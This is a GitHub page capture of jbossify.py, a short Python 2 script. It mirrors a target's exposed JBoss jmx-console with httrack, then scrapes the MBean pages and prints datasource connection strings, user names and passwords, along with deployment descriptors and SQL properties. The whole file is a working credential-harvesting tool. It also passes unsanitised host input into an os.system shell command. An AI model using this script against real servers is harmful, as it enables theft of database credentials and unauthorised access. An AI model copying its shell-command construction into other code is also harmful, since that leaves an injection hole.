-
Notifications
You must be signed in to change notification settings - Fork 2
/
jbossify.py
63 lines (54 loc) · 2.29 KB
/
jbossify.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import os,datetime,sys
from BeautifulSoup import BeautifulSoup
def usage():
print '%s <host> <port> <instance_name> [<properties to extract>]' % sys.argv[0]
print '%s --offline <instance_folder> [<properties to extract>] - for offline extraction' % sys.argv[0]
print ''
print '<properties to extract> - can be \'conn\',\'dd\',\'sql\' or \'all\' (default is just conn)'
print 'conn->ManagedConnectionFactoryProperties, dd->deploymentDescriptor, sql->SqlProperties'
def listFiles(rootdir):
fileList = []
for root, subFolders, files in os.walk(rootdir):
for file in files:
fileList.append(os.path.join(root,file))
return fileList
if len(sys.argv) < 3 or sys.argv[1] in ['-h','--help']:
usage()
sys.exit()
outputdir=''
opts=['conn'] #,'dd','sql']
if not sys.argv[1] == '--offline':
dt=datetime.datetime.now().strftime("%Y%m%dT%H%M%S")
name=sys.argv[3]
host=sys.argv[1]
port=sys.argv[2]
outputdir=name+'_'+dt
if len(sys.argv) == 5:
opts = sys.argv[4]
print """
[+] Connection successfully established
[+] Extracting java bullshit""" # TODO: link to debug
os.system('httrack http://'+host+':'+str(port)+'/jmx-console/HtmlAdaptor?action=displayMBeans --clean --spider -d -w -Y -%u -p1 -O '+outputdir)
else:
outputdir=sys.argv[2]
if len(sys.argv) == 4:
opts = sys.argv[3]
print '[+] Inspecting beans for selected options: %s...' % opts
xmlItems=['deploymentDescriptor','ManagedConnectionFactoryProperties','SqlProperties']
for file in listFiles(outputdir):
fileContents=open(file,'r').read()
for xmlItem in xmlItems:
if '<input type=\"text\" name=\"'+xmlItem+'\" value=\'' in fileContents:
xml=fileContents.split('<input type=\"text\" name=\"'+xmlItem+'\" value=\'')[1].rsplit('\' >')[0]
px=BeautifulSoup(xml)
if xmlItem == 'ManagedConnectionFactoryProperties' and ('conn' in opts or 'all' in opts):
cps = px.findAll('config-property', text=True)
if len(cps) > 2:
print 'connection string: %s user: %s passwd: %s' % (cps[0],cps[2],cps[3])
elif xmlItem == 'deploymentDescriptor' and ('dd' in opts or 'all' in opts):
cps = px.findAll('config-property', text=True)
print cps
elif xmlItem == 'SqlProperties' and ('sql' in opts or 'all' in opts):
cps = px.findAll(text=True)
print cps
print '[+] done!'